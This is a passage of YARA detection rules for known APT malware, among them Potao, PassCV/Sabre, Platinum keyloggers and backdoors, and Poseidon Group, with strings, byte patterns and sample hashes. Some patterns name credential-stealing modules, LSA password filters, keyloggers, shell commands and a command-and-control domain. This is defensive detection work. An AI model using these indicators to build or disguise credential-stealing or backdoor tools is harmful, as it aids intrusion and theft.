    hash6 = "fad20abf8aa4eda0802504d806280dd7"
    hash7 = "ab621059de2d1c92c3e7514e4b51751a"
    hash8 = "510b77a4b075f09202209f989582dbea"
    hash9 = "d1b1abfcc2d547e1ea1a4bb82294b9a3"
    hash10 = "4692337bf7584f6bda464b9a76d268c1"
    hash11 = "7cae5757f3ba9fef0a22ca0d56188439"
    hash12 = "1a7ba923c6aa39cc9cb289a17599fce0"
    hash13 = "f86db1905b3f4447eb5728859f9057b5"
    hash14 = "37c6d1d3054e554e13d40ea42458ebed"
    hash15 = "3e7430a09a44c0d1000f76c3adc6f4fa"
    hash16 = "98eb249e4ddc4897b8be6fe838051af7"
    hash17 = "1b57a7fad852b1d686c72e96f7837b44"
    hash18 = "ffb84b8561e49a8db60e0001f630831f"
    hash19 = "98eb249e4ddc4897b8be6fe838051af7"
    hash20 = "dfb4025352a80c2d81b84b37ef00bcd0"
    hash21 = "4457e89f4aec692d8507378694e0a3ba"
    hash22 = "48de562acb62b469480b8e29821f33b8"
    hash23 = "7a7eed9f2d1807f55a9308e21d81cccd"
    hash24 = "6817b29e9832d8fd85dcbe4af176efb6"
  strings:
    $s0 = "flash.Media.Sound()"
    $s1 = "call Kernel32!VirtualAlloc(0x1f140000hash$=0x10000hash$=0x1000hash$=0x40)"
    $s2 = "{4D36E972-E325-11CE-BFC1-08002BE10318}"
    $s3 = "NetStream"
  condition:
    all of them
}

rule Misdat_Backdoor_Packed {
  meta:
    author = "Cylance SPEAR Team"
    note = "Probably Prone to False Positive"
  strings:
    $upx = { 33 2E 30 33 00 55 50 58 21 }
    $send = { 00 00 00 73 65 6E 64 00 00 00 }
    $delphi_sec_pe = { 50 45 00 00 4C 01 03 00 19 5E 42 2A }
    $shellexec = { 00 00 00 53 68 65 6C 6C 45 78 65 63 75 74 65 57 00 00 00 }
  condition:
    filesize < 102400 and $upx and $send and $delphi_sec_pe and $shellexec
}

rule MiSType_Backdoor_Packed {
  meta:
    author = "Cylance SPEAR Team"
    note = "Probably Prone to False Positive"
  strings:
    $upx = { 33 2E 30 33 00 55 50 58 21 }
    $send_httpquery = { 00 00 00 48 74 74 70 51 75 65 72 79 49 6E 66 6F 41 00 00 73 65 6E 64 00 00 }
    $delphi_sec_pe = { 50 45 00 00 4C 01 03 00 19 5E 42 2A }
  condition:
    filesize < 102400 and $upx and $send_httpquery and $delphi_sec_pe
}

rule Misdat_Backdoor {
  meta:
    author = "Cylance SPEAR Team"
  strings:
    $imul = { 03 45 F8 69 C0 D9 DB 00 00 05 3B DA 00 00 }
    $delphi = { 50 45 00 00 4C 01 08 00 19 5E 42 2A }
  condition:
    $imul and $delphi
}

rule SType_Backdoor {
  meta:
    author = "Cylance SPEAR Team"
  strings:
    $stype = "stype=info&data="
    $mmid = "?mmid="
    $status = "&status=run succeed"
    $mutex = "_KB10B2D1_CIlFD2C"
    $decode = { 8B 1A 8A 1B 80 EB 02 8B 74 24 08 32 1E 8B 31 88 1E 8B 1A 43 }
  condition:
    $stype or ($mmid and $status) or $mutex or $decode
}

rule Zlib_Backdoor {
  meta:
    author = "Cylance SPEAR Team"
  strings:
    $auth = { C6 45 D8 50 C6 45 D9 72 C6 45 DA 6F C6 45 DB 78 C6 45 DC 79 C6 45 DD 2D }
    $auth2 = { C7 45 FC 00 04 00 00 C6 45 ?? 50 C6 45 ?? 72 C6 45 ?? 6F }
    $ntlm = "NTLM" wide
  condition:
    ($auth or $auth2) and $ntlm
}

private rule PotaoDecoy {
  strings:
    $mz = { 4D 5A }
    $str1 = "eroqw11"
    $str2 = "2sfsdf"
    $str3 = "RtlDecompressBuffer"
    $wiki_str = "spanned more than 100 years and ruined three consecutive" wide
    $old_ver1 = { 53 68 65 6C 6C 33 32 2E 64 6C 6C 00 64 61 66 73 72 00 00 00 64 61 66 73 72 00 00 00 64 6F 63 ( 00 | 78 ) }
    $old_ver2 = { 6F 70 65 6E 00 00 00 00 64 6F 63 00 64 61 66 73 72 00 00 00 53 68 65 6C 6C 33 32 2E 64 6C 6C 00 }
  condition:
    ($mz at 0) and ((all of ($str*)) or any of ($old_ver*) or $wiki_str)
}

private rule PotaoDll {
  strings:
    $mz = { 4D 5A }
    $dllstr1 = "?AVCncBuffer@@"
    $dllstr2 = "?AVCncRequest@@"
    $dllstr3 = "Petrozavodskaya, 11, 9"
    $dllstr4 = "_Scan@0"
    $dllstr5 = "\x00/sync/document/"
    $dllstr6 = "\\temp.temp"
    $dllname1 = "node69MainModule.dll"
    $dllname2 = "node69-main.dll"
    $dllname3 = "node69MainModuleD.dll"
    $dllname4 = "task-diskscanner.dll"
    $dllname5 = "\x00Screen.dll"
    $dllname6 = "Poker2.dll"
    $dllname7 = "PasswordStealer.dll"
    $dllname8 = "KeyLog2Runner.dll"
    $dllname9 = "GetAllSystemInfo.dll"
    $dllname10 = "FilePathStealer.dll"
  condition:
    ($mz at 0) and (any of ($dllstr*) and any of ($dllname*))
}

private rule PotaoUSB {
  strings:
    $mz = { 4D 5A }
    $binary1 = { 33 C0 8B C8 83 E1 03 BA ?? ?? ?? 00 2B D1 8A 0A 32 88 ?? ?? ?? 00 2A C8 FE C9 88 88 ?? ?? ?? 00 40 3D ?? ?? 00 00 7C DA C3 }
    $binary2 = { 55 8B EC 51 56 C7 45 FC 00 00 00 00 EB 09 8B 45 FC 83 C0 01 89 45 FC 81 7D FC ?? ?? 00 00 7D 3D 8B 4D FC 0F BE 89 ?? ?? ?? 00 8B 45 FC 33 D2 BE 04 00 00 00 F7 F6 B8 03 00 00 00 2B C2 0F BE 90 ?? ?? ?? 00 33 CA 2B 4D FC 83 E9 01 81 E1 FF 00 00 00 8B 45 FC 88 88 ?? ?? ?? 00 EB B1 5E 8B E5 5D C3 }
  condition:
    ($mz at 0) and any of ($binary*)
}

private rule PotaoSecondStage {
  strings:
    $mz = { 4D 5A }
    $binary1 = { 51 7A BB 85 [10-180] E8 47 D2 A8 }
    $binary2 = { 5F 21 63 DD [10-30] EC FD 33 02 }
    $binary3 = { CA 77 67 57 [10-30] BA 08 20 7A }
    $str1 = "?AVCrypt32Import@@"
    $str2 = "%.5llx"
  condition:
    ($mz at 0) and any of ($binary*) and any of ($str*)
}

rule Potao {
  meta:
    Author = "Anton Cherepanov"
    Date = "2015/07/29"
    Description = "Operation Potao"
    Reference = "http://www.welivesecurity.com/wp-content/uploads/2015/07/Operation-Potao-Express_final_v2.pdf"
    Source = "https://github.com/eset/malware-ioc/"
    Contact = "threatintel@eset.com"
    License = "BSD 2-Clause"
  condition:
    PotaoDecoy or PotaoDll or PotaoUSB or PotaoSecondStage
}

rule backdoor_apt_pcclient {
  meta:
    author = "@patrickrolsen"
    maltype = "APT.PCCLient"
    filetype = "DLL"
    version = "0.1"
    description = "Detects the dropper: 869fa4dfdbabfabe87d334f85ddda234 AKA dw20.dll/msacm32.drv dropped by 4a85af37de44daf5917f545c6fd03902 (RTF)"
    date = "2012-10"
  strings:
    $magic = { 4D 5A }
    $string1 = "www.micro1.zyns.com"
    $string2 = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)"
    $string3 = "msacm32.drv" wide
    $string4 = "C:\\Windows\\Explorer.exe" wide
    $string5 = "Elevation:Administrator!" wide
    $string6 = "C:\\Users\\cmd\\Desktop\\msacm32\\Release\\msacm32.pdb"
  condition:
    $magic at 0 and 4 of ($string*)
}

rule PassCV_Sabre_Malware_1 {
  meta:
    description = "PassCV Malware mentioned in Cylance Report"
    author = "Florian Roth"
    reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
    date = "2016-10-20"
    hash1 = "24a9bfbff81615a42e42755711c8d04f359f3bf815fb338022edca860ff1908a"
    hash2 = "e61e56b8f2666b9e605127b4fcc7dc23871c1ae25aa0a4ea23b48c9de35d5f55"
  strings:
    $x1 = "F:\\Excalibur\\Excalibur\\Excalibur\\" ascii
    $x2 = "bin\\oSaberSvc.pdb" ascii
    $s1 = "cmd.exe /c MD " ascii fullword
    $s2 = "https://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=0&rsv_idx=1&tn=baidu&wd=ip138" wide fullword
    $s3 = "CloudRun.exe" wide fullword
    $s4 = "SaberSvcB.exe" wide fullword
    $s5 = "SaberSvc.exe" wide fullword
    $s6 = "SaberSvcW.exe" wide fullword
    $s7 = "tianshiyed@iaomaomark1#23mark123tokenmarkqwebjiuga664115" wide fullword
    $s8 = "Internet Connect Failed!" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 1024000 and (1 of ($x*) and 5 of ($s*))) or (all of them)
}

rule PassCV_Sabre_Malware_Signing_Cert {
  meta:
    description = "PassCV Malware mentioned in Cylance Report"
    author = "Florian Roth"
    reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
    date = "2016-10-20"
    score = 50
    hash1 = "7c32885c258a6d5be37ebe83643f00165da3ebf963471503909781540204752e"
  strings:
    $s1 = "WOODTALE TECHNOLOGY INC" ascii
    $s2 = "Flyingbird Technology Limited" ascii
    $s3 = "Neoact Co., Ltd." ascii
    $s4 = "AmazGame Age Internet Technology Co., Ltd" ascii
    $s5 = "EMG Technology Limited" ascii
    $s6 = "Zemi Interactive Co., Ltd" ascii
    $s7 = "337 Technology Limited" ascii
    $s8 = "Runewaker Entertainment0" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 3072000 and 1 of them)
}

rule PassCV_Sabre_Malware_2 {
  meta:
    description = "PassCV Malware mentioned in Cylance Report"
    author = "Florian Roth"
    reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
    date = "2016-10-20"
    hash1 = "475d1c2d36b2cf28b28b202ada78168e7482a98b42ff980bbb2f65c6483db5b4"
    hash2 = "009645c628e719fad2e280ef60bbd8e49bf057196ac09b3f70065f1ad2df9b78"
    hash3 = "92479c7503393fc4b8dd7c5cd1d3479a182abca3cda21943279c68a8eef9c64b"
    hash4 = "0c7b952c64db7add5b8b50b1199fc7d82e9b6ac07193d9ec30e5b8d353b1f6d2"
  strings:
    $x1 = "ncProxyXll" ascii fullword
    $s1 = "Uniscribe.dll" ascii fullword
    $s2 = "WS2_32.dll" ascii
    $s3 = "ProxyDll" ascii fullword
    $s4 = "JDNSAPI.dll" ascii fullword
    $s5 = "x64.dat" ascii fullword
    $s6 = "LSpyb2" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 4096000 and $x1) or (all of them)
}

rule PassCV_Sabre_Malware_Excalibur_1 {
  meta:
    description = "PassCV Malware mentioned in Cylance Report"
    author = "Florian Roth"
    reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
    date = "2016-10-20"
    hash1 = "21566f5ff7d46cc9256dae8bc7e4c57f2b9261f95f6ad2ac921558582ea50dfb"
    hash2 = "02922c5d994e81629d650be2a00507ec5ca221a501fe3827b5ed03b4d9f4fb70"
  strings:
    $x1 = "F:\\Excalibur\\Excalibur\\" ascii
    $x2 = "Excalibur\\bin\\Shell.pdb" ascii
    $x3 = "SaberSvc.exe" wide
    $s1 = "BBB.exe" wide fullword
    $s2 = "AAA.exe" wide fullword
  condition:
    (uint16(0) == 23117 and filesize < 2048000 and 1 of ($x*) or all of ($s*)) or 3 of them
}

rule PassCV_Sabre_Malware_3 {
  meta:
    description = "PassCV Malware mentioned in Cylance Report"
    author = "Florian Roth"
    reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
    date = "2016-10-20"
    hash1 = "28c7575b2368a9b58d0d1bf22257c4811bd3c212bd606afc7e65904041c29ce1"
  strings:
    $x1 = "NXKILL" wide fullword
    $s1 = "2OLE32.DLL" ascii fullword
    $s2 = "localspn.dll" wide fullword
    $s3 = "!This is a Win32 program." ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 8192000 and $x1 and 2 of ($s*))
}

rule PassCV_Sabre_Malware_4 {
  meta:
    description = "PassCV Malware mentioned in Cylance Report"
    author = "Florian Roth"
    reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
    date = "2016-10-20"
    hash1 = "27463bcb4301f0fdd95bc10bf67f9049e161a4e51425dac87949387c54c9167f"
  strings:
    $s1 = "QWNjZXB0On" ascii fullword
    $s2 = "VXNlci1BZ2VudDogT" ascii fullword
    $s3 = "dGFzay5kbnME3luLmN" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 204800 and 2 of them)
}

rule PassCV_Sabre_Tool_NTScan {
  meta:
    description = "PassCV Malware mentioned in Cylance Report"
    author = "Florian Roth"
    reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
    date = "2016-10-20"
    hash1 = "0f290612b26349a551a148304a0bd3b0d0651e9563425d7c362f30bd492d8665"
  strings:
    $x1 = "NTscan.EXE" wide fullword
    $x2 = "NTscan Microsoft " wide fullword
    $s1 = "admin$" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 307200 and 2 of them)
}

rule PassCV_Sabre_Malware_5 {
  meta:
    description = "PassCV Malware mentioned in Cylance Report"
    author = "Florian Roth"
    reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
    date = "2016-10-20"
    hash1 = "03aafc5f468a84f7dd7d7d38f91ff17ef1ca044e5f5e8bbdfe589f5509b46ae5"
  strings:
    $x1 = "ncircTMPg" ascii fullword
    $x2 = "~SHELL#" ascii fullword
    $x3 = "N.adobe.xm" ascii fullword
    $s1 = "NEL32.DLL" ascii fullword
    $s2 = "BitLocker.exe" wide fullword
    $s3 = "|xtplhd" ascii fullword
    $s4 = "SERVICECORE" wide fullword
    $s5 = "SHARECONTROL" wide fullword
  condition:
    (uint16(0) == 23117 and filesize < 4096000 and 1 of ($x*) or all of ($s*))
}

rule APT_Win_Pipcreat {
  meta:
    author = "chort (@chort0)"
    description = "APT backdoor Pipcreat"
    filetype = "pe,dll"
    date = "2013-03"
    MD5 = "f09d832bea93cf320986b53fce4b8397"
    Reference = "http://www.cyberengineeringservices.com/login-exe-analysis-trojan-pipcreat/"
    version = "1.0"
  strings:
    $strA = "pip creat failed" wide fullword
    $strB = "CraatePipe" ascii fullword
    $strC = "are you there? " wide fullword
    $strD = "success kill process ok" wide fullword
    $strE = "Vista|08|Win7" wide fullword
    $rut = "are you there!@#$%^&*()_+" ascii fullword
  condition:
    $rut or (2 of ($str*))
}

rule Trojan_Win32_PlaSrv {
  meta:
    author = "Microsoft"
    description = "Hotpatching Injector"
    original_sample_sha1 = "ff7f949da665ba8ce9fb01da357b51415634eaad"
    unpacked_sample_sha1 = "dff2fee984ba9f5a8f5d97582c83fca4fa1fe131"
    activity_group = "Platinum"
    version = "1.0"
    last_modified = "2016-04-12"
  strings:
    $Section_name = ".hotp1"
    $offset_x59 = { C7 80 64 01 00 00 00 00 01 00 }
  condition:
    $Section_name and $offset_x59
}

rule Trojan_Win32_Platual {
  meta:
    author = "Microsoft"
    description = "Installer component"
    original_sample_sha1 = "e0ac2ae221328313a7eee33e9be0924c46e2beb9"
    unpacked_sample_sha1 = "ccaf36c2d02c3c5ca24eeeb7b1eae7742a23a86a"
    activity_group = "Platinum"
    version = "1.0"
    last_modified = "2016-04-12"
  strings:
    $class_name = "AVCObfuscation"
    $scrambled_dir = { A8 8B B8 E3 B1 D7 FE 85 51 32 3E C0 F1 B7 73 99 }
  condition:
    $class_name and $scrambled_dir
}

rule Trojan_Win32_Plaplex {
  meta:
    author = "Microsoft"
    description = "Variant of the JPin backdoor"
    original_sample_sha1 = "ca3bda30a3cdc15afb78e54fa1bbb9300d268d66"
    unpacked_sample_sha1 = "2fe3c80e98bbb0cf5a0c4da286cd48ec78130a24"
    activity_group = "Platinum"
    version = "1.0"
    last_modified = "2016-04-12"
  strings:
    $class_name1 = "AVCObfuscation"
    $class_name2 = "AVCSetiriControl"
  condition:
    $class_name1 and $class_name2
}

rule Trojan_Win32_Dipsind_B {
  meta:
    author = "Microsoft"
    description = "Dipsind Family"
    sample_sha1 = "09e0dfbb5543c708c0dd6a89fd22bbb96dc4ca1c"
    activity_group = "Platinum"
    version = "1.0"
    last_modified = "2016-04-12"
  strings:
    $frg1 = { 8D 90 04 01 00 00 33 C0 F2 AE F7 D1 2B F9 8B C1 8B F7 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 4D EC 8B 15 ?? ?? ?? ?? 89 91 ?? 07 00 00 }
    $frg2 = { 68 A1 86 01 00 C1 E9 02 F3 AB 8B CA 83 E1 03 F3 AA }
    $frg3 = { C0 E8 07 D0 E1 0A C1 8A C8 32 D0 C0 E9 07 D0 E0 0A C8 32 CA 80 F1 63 }
  condition:
    $frg1 and $frg2 and $frg3
}

rule Trojan_Win32_PlaKeylog_B {
  meta:
    author = "Microsoft"
    description = "Keylogger component"
    original_sample_sha1 = "0096a3e0c97b85ca75164f48230ae530c94a2b77"
    unpacked_sample_sha1 = "6a1412daaa9bdc553689537df0a004d44f8a45fd"
    activity_group = "Platinum"
    version = "1.0"
    last_modified = "2016-04-12"
  strings:
    $hook = { C6 06 FF 46 C6 06 25 }
    $dasm_engine = { 80 C9 10 88 0E 8A CA 80 E1 07 43 88 56 03 80 F9 05 }
  condition:
    $hook and $dasm_engine
}

rule Trojan_Win32_Adupib {
  meta:
    author = "Microsoft"
    description = "Adupib SSL Backdoor"
    original_sample_sha1 = "d3ad0933e1b114b14c2b3a2c59d7f8a95ea0bcbd"
    unpacked_sample_sha1 = "a80051d5ae124fd9e5cc03e699dd91c2b373978b"
    activity_group = "Platinum"
    version = "1.0"
    last_modified = "2016-04-12"
  strings:
    $str1 = "POLL_RATE"
    $str2 = "OP_TIME(end hour)"
    $str3 = "%d:TCP:*:Enabled"
    $str4 = "%s[PwFF_cfg%d]"
    $str5 = "Fake_GetDlgItemTextW: ***value***="
  condition:
    $str1 and $str2 and $str3 and $str4 and $str5
}

rule Trojan_Win32_PlaLsaLog {
  meta:
    author = "Microsoft"
    description = "Loader / possible incomplete LSA Password Filter"
    original_sample_sha1 = "fa087986697e4117c394c9a58cb9f316b2d9f7d8"
    unpacked_sample_sha1 = "29cb81dbe491143b2f8b67beaeae6557d8944ab4"
    activity_group = "Platinum"
    version = "1.0"
    last_modified = "2016-04-12"
  strings:
    $str1 = { 8A 1C 01 32 DA 88 1C 01 8B 74 24 0C 41 3B CE 7C EF 5B 5F C6 04 01 00 5E 81 C4 04 01 00 00 C3 }
    $str2 = "PasswordChangeNotify"
  condition:
    $str1 and $str2
}

rule Trojan_Win32_Plagon {
  meta:
    author = "Microsoft"
    description = "Dipsind variant"
    original_sample_sha1 = "48b89f61d58b57dba6a0ca857bce97bab636af65"
    unpacked_sample_sha1 = "6dccf88d89ad7b8611b1bc2e9fb8baea41bdb65a"
    activity_group = "Platinum"
    version = "1.0"
    last_modified = "2016-04-12"
  strings:
    $str1 = "VPLRXZHTU"
    $str2 = { 64 6F 67 32 6A 7E 6C }
    $str3 = "Dqpqftk(Wou\"Isztk)"
    $str4 = "StartThreadAtWinLogon"
  condition:
    $str1 and $str2 and $str3 and $str4
}

rule Trojan_Win32_Plakelog {
  meta:
    author = "Microsoft"
    description = "Raw-input based keylogger"
    original_sample_sha1 = "3907a9e41df805f912f821a47031164b6636bd04"
    unpacked_sample_sha1 = "960feeb15a0939ec0b53dcb6815adbf7ac1e7bb2"
    activity_group = "Platinum"
    version = "1.0"
    last_modified = "2016-04-12"
  strings:
    $str1 = "<0x02>" wide
    $str2 = "[CTR-BRK]" wide
    $str3 = "[/WIN]" wide
    $str4 = { 8A 16 8A 18 32 DA 46 88 18 8B 15 08 E6 42 00 40 41 3B CA 72 EB 5E 5B }
  condition:
    $str1 and $str2 and $str3 and $str4
}

rule Trojan_Win32_Plainst {
  meta:
    author = "Microsoft"
    description = "Installer component"
    original_sample_sha1 = "99c08d31af211a0e17f92dd312ec7ca2b9469ecb"
    unpacked_sample_sha1 = "dcb6cf7cf7c8fdfc89656a042f81136bda354ba6"
    activity_group = "Platinum"
    version = "1.0"
    last_modified = "2016-04-12"
  strings:
    $str1 = { 66 8B 14 4D 18 50 01 10 8B 45 08 66 33 14 70 46 66 89 54 77 FE 66 83 7C 77 FE 00 75 B7 8B 4D FC 89 41 08 8D 04 36 89 41 0C 89 79 04 }
    $str2 = { 4B D3 91 49 A1 80 91 42 83 B6 33 28 36 6B 90 97 }
  condition:
    $str1 and $str2
}

rule Trojan_Win32_Plagicom {
  meta:
    author = "Microsoft"
    description = "Installer component"
    original_sample_sha1 = "99dcb148b053f4cef6df5fa1ec5d33971a58bd1e"
    unpacked_sample_sha1 = "c1c950bc6a2ad67488e675da4dfc8916831239a7"
    activity_group = "Platinum"
    version = "1.0"
    last_modified = "2016-04-12"
  strings:
    $str1 = { C6 44 24 ?? 68 C6 44 24 ?? 4D C6 44 24 ?? 53 C6 44 24 ?? 56 C6 44 24 ?? 00 }
    $str2 = "OUEMM/EMM"
    $str3 = { 85 C9 7E 08 FE 0C 10 40 3B C1 7C F8 C3 }
  condition:
    $str1 and $str2 and $str3
}

rule Trojan_Win32_Plaklog {
  meta:
    author = "Microsoft"
    description = "Hook-based keylogger"
    original_sample_sha1 = "831a5a29d47ab85ee3216d4e75f18d93641a9819"
    unpacked_sample_sha1 = "e18750207ddbd939975466a0e01bd84e75327dda"
    activity_group = "Platinum"
    version = "1.0"
    last_modified = "2016-04-12"
  strings:
    $str1 = "++[%s^^unknown^^%s]++"
    $str2 = "vtfs43/emm"
    $str3 = { 33 C9 39 4C 24 08 7E 10 8B 44 24 04 03 C1 80 00 08 41 3B 4C 24 08 7C F0 C3 }
  condition:
    $str1 and $str2 and $str3
}

rule Trojan_Win32_Plapiio {
  meta:
    author = "Microsoft"
    description = "JPin backdoor"
    original_sample_sha1 = "3119de80088c52bd8097394092847cd984606c88"
    unpacked_sample_sha1 = "3acb8fe2a5eb3478b4553907a571b6614eb5455c"
    activity_group = "Platinum"
    version = "1.0"
    last_modified = "2016-04-12"
  strings:
    $str1 = "ServiceMain"
    $str2 = "Startup"
    $str3 = { C6 45 ?? 68 C6 45 ?? 4D C6 45 ?? 53 C6 45 ?? 56 C6 45 ?? 6D C6 45 ?? 6D }
  condition:
    $str1 and $str2 and $str3
}

rule Trojan_Win32_Plabit {
  meta:
    author = "Microsoft"
    description = "Installer component"
    sample_sha1 = "6d1169775a552230302131f9385135d385efd166"
    activity_group = "Platinum"
    version = "1.0"
    last_modified = "2016-04-12"
  strings:
    $str1 = { 4B D3 91 49 A1 80 91 42 83 B6 33 28 36 6B 90 97 }
    $str2 = "GetInstanceW"
    $str3 = { 8B D0 83 E2 1F 8A 14 0A 30 14 30 40 3B 44 24 04 72 EE }
  condition:
    $str1 and $str2 and $str3
}

rule Trojan_Win32_Placisc2 {
  meta:
    author = "Microsoft"
    description = "Dipsind variant"
    original_sample_sha1 = "bf944eb70a382bd77ee5b47548ea9a4969de0527"
    unpacked_sample_sha1 = "d807648ddecc4572c7b04405f496d25700e0be6e"
    activity_group = "Platinum"
    version = "1.0"
    last_modified = "2016-04-12"
  strings:
    $str1 = { 76 16 8B D0 83 E2 07 8A 4C 14 24 8A 14 18 32 D1 88 14 18 40 3B C7 72 EA }
    $str2 = "VPLRXZHTU"
    $str3 = "%d) Command:%s"
    $str4 = { 0D 0A 2D 2D 2D 2D 2D 09 2D 2D 2D 2D 2D 2D 0D 0A }
  condition:
    $str1 and $str2 and $str3 and $str4
}

rule Trojan_Win32_Placisc3 {
  meta:
    author = "Microsoft"
    description = "Dipsind variant"
    original_sample_sha1 = "1b542dd0dacfcd4200879221709f5fa9683cdcda"
    unpacked_sample_sha1 = "bbd4992ee3f3a3267732151636359cf94fb4575d"
    activity_group = "Platinum"
    version = "1.0"
    last_modified = "2016-04-12"
  strings:
    $str1 = { BA 6E 00 00 00 66 89 95 ?? ?? FF FF B8 73 00 00 00 66 89 85 ?? ?? FF FF B9 64 00 00 00 66 89 8D ?? ?? FF FF BA 65 00 00 00 66 89 95 ?? ?? FF FF B8 6C 00 00 00 }
    $str2 = "VPLRXZHTU"
    $str3 = { 8B 44 24 ?? 8A 04 01 41 32 C2 3B CF 7C F2 88 03 }
  condition:
    $str1 and $str2 and $str3
}

rule Trojan_Win32_Placisc4 {
  meta:
    author = "Microsoft"
    description = "Installer for Dipsind variant"
    original_sample_sha1 = "3d17828632e8ff1560f6094703ece5433bc69586"
    unpacked_sample_sha1 = "2abb8e1e9cac24be474e4955c63108ff86d1a034"
    activity_group = "Platinum"
    version = "1.0"
    last_modified = "2016-04-12"
  strings:
    $str1 = { 8D 71 01 8B C6 99 BB 0A 00 00 00 F7 FB 0F BE D2 0F BE 04 39 2B C2 88 04 39 84 C0 74 0A }
    $str2 = { 6A 04 68 00 20 00 00 68 00 00 40 00 6A 00 FF D5 }
    $str3 = { C6 44 24 ?? 64 C6 44 24 ?? 6F C6 44 24 ?? 67 C6 44 24 ?? 32 C6 44 24 ?? 6A }
  condition:
    $str1 and $str2 and $str3
}

rule Trojan_Win32_Plakpers {
  meta:
    author = "Microsoft"
    description = "Injector / loader component"
    original_sample_sha1 = "fa083d744d278c6f4865f095cfd2feabee558056"
    unpacked_sample_sha1 = "3a678b5c9c46b5b87bfcb18306ed50fadfc6372e"
    activity_group = "Platinum"
    version = "1.0"
    last_modified = "2016-04-12"
  strings:
    $str1 = "MyFileMappingObject"
    $str2 = "[%.3u] %s %s %s [%s:" wide
    $str3 = "%s\\{%s}\\%s" wide
  condition:
    $str1 and $str2 and $str3
}

rule Trojan_Win32_Plainst2 {
  meta:
    author = "Microsoft"
    description = "Zc tool"
    original_sample_sha1 = "3f2ce812c38ff5ac3d813394291a5867e2cddcf2"
    unpacked_sample_sha1 = "88ff852b1b8077ad5a19cc438afb2402462fbd1a"
    activity_group = "Platinum"
    version = "1.0"
    last_modified = "2016-04-12"
  strings:
    $str1 = "Connected [%s:%d]..."
    $str2 = "reuse possible: %c"
    $str3 = "] => %d%%\x0a"
  condition:
    $str1 and $str2 and $str3
}

rule Trojan_Win32_Plakpeer {
  meta:
    author = "Microsoft"
    description = "Zc tool v2"
    original_sample_sha1 = "2155c20483528377b5e3fde004bb604198463d29"
    unpacked_sample_sha1 = "dc991ef598825daabd9e70bac92c79154363bab2"
    activity_group = "Platinum"
    version = "1.0"
    last_modified = "2016-04-12"
  strings:
    $str1 = "@@E0020(%d)" wide
    $str2 = /exit.{0,3}@exit.{0,3}new.{0,3}query.{0,3}rcz.{0,3}scz/ wide
    $str3 = "---###---" wide
    $str4 = "---@@@---" wide
  condition:
    $str1 and $str2 and $str3 and $str4
}

rule PoseidonGroup_Malware {
  meta:
    description = "Detects Poseidon Group Malware"
    author = "Florian Roth"
    reference = "https://securelist.com/blog/research/73673/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/"
    date = "2016-02-09"
    score = 85
    hash1 = "337e94119cfad0b3144af81b72ac3b2688a219ffa0bdf23ca56c7a68fbe0aea4"
    hash2 = "344034c0bf9fcd52883dbc158abf6db687150d40a118d9cd6ebd843e186128d3"
    hash3 = "432b7f7f7bf94260a58ad720f61d91ba3289bf0a9789fc0c2b7ca900788dae61"
    hash4 = "8955df76182005a69f19f5421c355f1868efe65d6b9e0145625dceda94b84a47"
    hash5 = "d090b1d77e91848b1e2f5690b54360bbbd7ef808d017304389b90a0f8423367f"
    hash6 = "d7c8b47a0d0a9181fb993f17e165d75a6be8cf11812d3baf7cf11d085e21d4fb"
    hash7 = "ded0ee29af97496f27d810f6c16d78a3031d8c2193d5d2a87355f3e3ca58f9b3"
  strings:
    $s1 = "c:\\winnt\\system32\\cmd.exe" ascii fullword
    $s2 = "c:\\windows\\system32\\cmd.exe" ascii fullword
    $s3 = "c:\\windows\\command.com" ascii fullword
    $s4 = "copy \"%s\" \"%s\" /Y" ascii fullword
    $s5 = "http://%s/files/" ascii fullword
    $s6 = "\"%s\". %s: \"%s\"." ascii fullword
    $s7 = "0x0666" ascii fullword
    $s8 = "----------------This_is_a_boundary$" ascii fullword
    $s9 = "Server 2012" ascii fullword
    $s10 = "Server 2008" ascii fullword
    $s11 = "Server 2003" ascii fullword
    $a1 = "net.exe group \"Domain Admins\" /domain" ascii fullword
    $a2 = "net.exe group \"Admins. do Dom" ascii fullword
    $a3 = "(SVRID=%d)" ascii fullword
    $a4 = "(TG=%d)" ascii fullword
    $a5 = "(SVR=%s)" ascii fullword
    $a6 = "Set-Cookie:\\b*{.+?}\\n" wide fullword
    $a7 = "net.exe localgroup Administradores" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 665600 and 6 of ($s*)) or (4 of ($s*) and 1 of ($a*))
}

rule PoseidonGroup_MalDoc_1 {
  meta:
    description = "Detects Poseidon Group - Malicious Word Document"
    author = "Florian Roth"
    reference = "https://securelist.com/blog/research/73673/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/"
    date = "2016-02-09"
    score = 80
    hash = "0983526d7f0640e5765ded6be6c9e64869172a02c20023f8a006396ff358999b"
  strings:
    $s1 = "c:\\cmd32dll.exe" ascii fullword
  condition:
    uint16(0) == 53200 and filesize < 512000 and all of them
}

rule PoseidonGroup_MalDoc_2 {
  meta:
    description = "Detects Poseidon Group - Malicious Word Document"
    author = "Florian Roth"
    reference = "https://securelist.com/blog/research/73673/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/"
    date = "2016-02-09"
    score = 70
    hash1 = "3e4cacab0ff950da1c6a1c640fe6cf5555b99e36d4e1cf5c45f04a2048f7620c"
    hash2 = "1f77475d7740eb0c5802746d63e93218f16a7a19f616e8fddcbff07983b851af"
    hash3 = "f028ee20363d3a17d30175508bbc4738dd8e245a94bfb200219a40464dd09b3a"
    hash4 = "ec309300c950936a1b9f900aa30630b33723c42240ca4db978f2ca5e0f97afed"
